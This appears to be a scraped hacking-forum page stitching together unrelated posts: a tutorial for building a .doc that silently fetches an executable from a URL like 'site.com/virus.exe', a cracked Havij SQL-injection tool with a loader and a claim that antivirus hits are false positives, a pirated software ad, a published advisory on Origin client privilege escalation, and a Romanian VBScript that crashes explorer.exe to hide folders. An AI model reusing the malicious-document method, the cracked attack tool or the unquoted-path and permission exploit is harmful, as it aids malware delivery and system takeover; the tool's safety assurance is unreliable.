Search the Community

Download Python Once finished installing python open cmd and cd to the folder. Type fuddoc12ve3.exe anynameyouwant.doc h t t p: // site. com/ virus. exe Silent doc.zip — RGhost — file sharing + test** test.doc — RGhost — file sharing ** inside test.doc "shutdown -s -t 20000" Sursa: HF

1. Download the LINK DELETE! 2. Install Havij 1.17 Pro.exe 3. Then drag and drop loader.exe into the folder 4. Finally, use loader.exe to run Havij https://www.virustotal.com/ro/file/d99cf5e296e724089cf7e936d5561d45088ccd58b026b02835ea3727fbbb8c60/analysis/1435322891/ This is an SQLi tool which of course will contain false positives, so I can assure you that this program does not carry any sort of virus or malware. Though if you still feel unsafe, you may download and install Sandboxie and run the download through that.

Product Description Folder Marker Home lets you mark your folders with color-coded and image-coded icons with one mouse click, which makes them easy to find and retrieve. Simply select the folder you want to mark, right-click on its icon, select a color-coded icon from the drop-down menu and it will be assigned to the folder at once. Users can take advantage of great customization flexibility. You can, for example, modify a right-click menu of a folder by adding new menu items and categories and assigning icons to them. You also have the ability to add new items to Folder Marker’s icon set. Simply drop an ICL file to the appropriate folder and a new tab with folders from this file will appear. The user can choose to make folders, customized with Folder Marker Home, distributable. This means a color-coded icon remains unchanged even if the folder is copied onto a new computer or the system has been re-installed. Also, you can apply a selected icon to all sub-folders in a given folder. This is the perfect download for any home user who needs a little extra boost getting your files in order! Key features: For HOME use only! Folder Marker Home can modify the ‘Mark Folder’ menu. You can have your own menu with your own icons, specially made for your personal needs. It is VERY convenient. Folder Marker Home has two additional options for folder icon changes: “Make customized folder distributable” (portable) and “Apply selected icon to all subfolders” Folder Marker Home can change a folder’s color. For this purpose you have 36 icons of normal, dark and light colors. Folder Marker Home can mark folders by priority (high, normal, low), by degree of work complete (done, half-done, planned), by work status (approved, rejected, pending) and by the type of information contained in a folder (work files, important files, temp files, private files). Folder Marker Home changes folder icons within a popup menu of the folders. To mark a folder, you don’t even need to run the program! Moreover, the popup menu contains convenient category submenus. Folder Marker Home contains a User Icons tab where you can add an unlimited quantity of your favorite icons and mark folders with them. It’s easy! Folder Marker Home can work with several folders at once and supports 32-bits icons. -> Download <-Deal Expire in:

? Electronic Arts Origin Client 9.5.5 Multiple Privilege Escalation Vulnerabilities Vendor: Electronic Arts Inc. Product web page: https://www.origin.com Affected version: 9.5.5.2850 (353317) 9.5.3.636 (350385) 9.5.2.2829 (348065) Summary: Origin (formerly EA Download Manager (EADM)) is digital distribution software from Electronic Arts that allows users to purchase games on the internet for PC and mobile platforms, and download them with the Origin client (formerly EA Download Manager, EA Downloader and EA Link). Desc#1: The application is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (full) for the 'Everyone' and 'Users' group, for the 'OriginClientService.exe' binary file, and for all the files in the 'Origin' directory. The service is installed by default to start on system boot with LocalSystem privileges. Attackers can replace the binary with their rootkit, and on reboot they get SYSTEM privileges. Desc#2: Origin client service also suffers from an unquoted search path issue impacting the 'Origin Client Service' service for Windows deployed as part of the Origin Thin Setup bundle. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application. Tested on: Microsoft Windows 7 Professional SP1 (EN) Microsoft Windows 7 Ultimate SP1 (EN) Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5231 Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5231.php[/url] 14.12.2014 ************************************************************************** C:\>sc qc "Origin Client Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Origin Client Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Origin\OriginClientService.exe <-----< Unquoted path LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Origin Client Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>cacls "C:\Program Files (x86)\Origin\OriginClientService.exe" c:\Program Files (x86)\Origin\OriginClientService.exe Everyone:(ID)F <-----< Full control BUILTIN\Users:(ID)F <-----< Full control NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F C:\> ************************************************************************** ************************************************************************** C:\>cscript XCACLS.vbs "C:\Program Files (x86)\Origin\*.exe" Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. Starting XCACLS.VBS (Version: 5.2) Script at 15.12.2014 19:46:41 Startup directory: "C:\" Arguments Used: Filename = "C:\Program Files (x86)\Origin\*.exe" ************************************************************************** File: C:\Program Files (x86)\Origin\EAProxyInstaller.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** ************************************************************************** File: C:\Program Files (x86)\Origin\igoproxy64.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** ************************************************************************** File: C:\Program Files (x86)\Origin\Origin.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** ************************************************************************** File: C:\Program Files (x86)\Origin\OriginClientService.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** ************************************************************************** File: C:\Program Files (x86)\Origin\OriginCrashReporter.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** ************************************************************************** File: C:\Program Files (x86)\Origin\OriginER.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** ************************************************************************** File: C:\Program Files (x86)\Origin\OriginUninstall.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** Operation Complete Elapsed Time: 0,1796875 seconds. Ending Script at 15.12.2014 19:46:41 C:\> ************************************************************************** -- ************************************************************************** Changed permissions and service binary path name (vendor fix): -------------------------------------------------------------- C:\>sc qc "Origin Client Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Origin Client Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Origin\OriginClientService.exe" <-----< Quoted path LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Origin Client Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>icacls "C:\Program Files (x86)\Origin\OriginClientService.exe" C:\Program Files (x86)\Origin\OriginClientService.exe NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) <-----< Read and execute Successfully processed 1 files; Failed processing 0 files C:\> ************************************************************************** Source

În acest tutorial voi descrie o metod? interesant? de a ascunde fi?ierele ce nu vor putea fi accesate de c?tre utilizatorii sistemului de operare Windows (începând de la versiunea Win2000 ?i terminând cu ultima — Win8). De fapt merge vorba despre un bug, din cauza c?ruia procesul explorer.exe este obligat s? p?r?seasc? locul de munc? (pe scurt — se închide automat ?i se restarteaz?). Ideea const? în modificarea folderului ?i „transformarea” acestuia într-un shortcut ce face referire la fi?ierul desktop.ini din acela?i folder. Iat? de ce, atunci când explorer.exe încearc? s? afle propriet??ile folderului, acesta din urm? face din nou referire la obiectul s?u ?i... ?i tot a?a pân? când procesul se d? b?tut (iar acest lucru se întâmpl? foarte repede). Creators of „New folder” and „New folder (2)” proudly present — „New folder (3): The killer” — the drama of explorer.exe Istorie Persoana care a descoperit acest bug, fiind în anii studen?iei pe vremea când internetul „picura” cu un scâr?âit de mul?i cunoscut („pierzând toat? noaptea pentru a vedea 4-5 poze” ©) ?i dischetele erau la mod?, (persoana) dorea s? se asigure c? datele salvate într-un PC de la universitate nu vor fi ?terse sau copiate de c?tre al?i studen?i. Dat fiind faptul c? dischetele erau unicul ?i cel mai nesigur mod de a „transporta” datele din/c?tre acel PC, eroul nostru a hot?rât s? g?seasc? o metod? de a ascunde ?i de a proteja folderul personal pentru ca nimeni s? nu-l poat? ?terge sau copia. Despre ascunderea unui folder folosind func?iile Windows nici nu mergea vorba — to?i ?tiau cum pot fi g?site acestea. Îns?, dup? mai multe încerc?ri ?i teste, a g?sit un bug foarte interesant care opre?te for?at procesul explorer.exe atunci când utilizatorul deschide folderul personal sau folderul în care se afla acesta. El (eroul) ?tiind calea complet? putea accesa direct fi?ierele ascunse în folderul personal. Explica?ie De exemplu, fiecare utilizator avea dreptul de a crea/?terge/edita datele din folderul D:\usr\, în care fiecare student î?i salva informa?iile necesare. Eroul nostru îns?, dorind s? p?streze ?i ceva date mai importante a creat folderul D:\usr\name\key1\key2\ unde f?cea backup de pe dischet? ?i/sau salva alte informa?ii importante. Pentru D:\usr\name\key1\ îns? a folosit trucul de care vorbeam mai sus. Astfel, oricine încerca s? deschid? D:\usr\name\ sau D:\usr\name\key1\ (ace?tia probabil erau mai pu?ini, c?ci nu to?i reu?eau s? ?in? minte numele folderului \key1\) nu vedea altceva decât eroarea de r?mas bun al procesului explorer.exe. Autorul îns?, ?inând minte numele folderelor \key1\ ?i \key2\ insera direct calea c?tre acest ultim folder, iar explorer.exe r?mânea pe pozi?ii deoarece nu trebuia s? afle propriet??ile folderului \key1\. Transformare Pentru a proteja folderul folosind metoda de mai sus, e necesar s? parcurge?i urm?torii pa?i (în ordinea specificat?): Crea?i un folder în locul dorit Marca?i folderul ca fiind te tip „System” În acest folder crea?i un fi?ier desktop.txt în care scrie?i: [.ShellClassInfo] CLSID2={0AFACED1-E828-11D1-9187-B532F1E9575D} Flags=2 Redenumi?i fi?ierul desktop.txt în desktop.ini Crea?i un shortcut c?tre desktop.ini cu numele target.lnk Privi?i cum explorer.exe se zbate în ghiarele ciclului infinit. Bonus Totu?i, este ?i o mic? problem? — în cazul eroului, oricine putea ?terge folderul D:\usr\name\ f?r? a-l deschide. Îns?, voi oferi un mic bonus, pentru a interzice ?tergerea folderului personal. Chestia e foarte simpl? — pentru sistemele de operare Windows, exist? o list? de cuvinte cheie ce nu pot fi folosite la crearea unui folder sau fi?ier. Culmea e c?, a?a cum nu pot fi create astfel de obiecte, ele nu pot fi nici ?terse dac? s-a reu?it crearea unui astfel de obiect. Unul dintre aceste cuvinte cheie este ?i NUL. Ideea mea e simpl?, cre?m un folder cu numele NUL în folderul personal ?i în modul acesta interzicem ?tergerea acestuia din urm?. Automatizare Pentru a simplifica tot ce a fost scris mai sus, am f?cut un mic script în VBScript care trebuie salvat în folderul personal ca pe un fi?ier cu extensia .vbs — executând scriptul de mai jos în folderul personal, acesta v-a fi modificat corespunz?tor, iar procesul explorer.exe se v-a restarta. ' Indic?m dac? folderul poate fi ?ters sau nu Removable = false ' Ob?inem loca?ia folderului curent Set fs = WScript.createObject("Scripting.FileSystemObject") folder = fs.GetAbsolutePathName(".") ' Dac? e nevoie, folosim un mic truc pentru a proteja ?tergerea folderului If Not Removable Then ' Cre?m un folder aleatoriu Randomize secretFolder = folder & "\" & Int(Rnd(1) * 99999999) & "\" fs.createFolder(secretFolder) ' NUL folder On Error Resume Next fs.createFolder(secretFolder & "\NUL\") End If ' Marc?m folderul ca fiind de tip "system" fs.getFolder(folder).attributes = 4 ' Liniile ce vor fi scrise în fi?ierul desktop.ini lines = Array("[.ShellClassInfo]", "CLSID2={0AFACED1-E828-11D1-9187-B532F1E9575D}", "Flags=2") ' Scriem datele necesare în desktop.ini Set file = fs.openTextFile(folder + "\desktop.ini", 2, True) file.write join(lines, vbCrLf) file.close ' Cre?m shortcut-ul target.lnk c?tre fi?ierul desktop.ini Set link = WScript.CreateObject("WScript.Shell").createShortcut(folder + "\target.lnk") link.targetPath = folder + "\desktop.ini" link.save msgBox "Folder-ul a fost modificat cu succes", 64, "Explorer.exe: Au revoir mon cheri" Sfaturi Nu crea?i folderul personal pe desktopul propriu (ghici?i de ce) Nu uita?i c? folderul personal poate fi accesat din alt sistem de operare Nu uita?i c? discul local poate fi formatat (astfel nu v? mai protejeaz? nimic datele) Nu uita?i c? cuvântul cheie NUL este valabil doar pentru Windows Nu uita?i s? experimenta?i — e un bug foarte iste? Nu uita?i s? posta?i întreb?rile ?i ideile voastre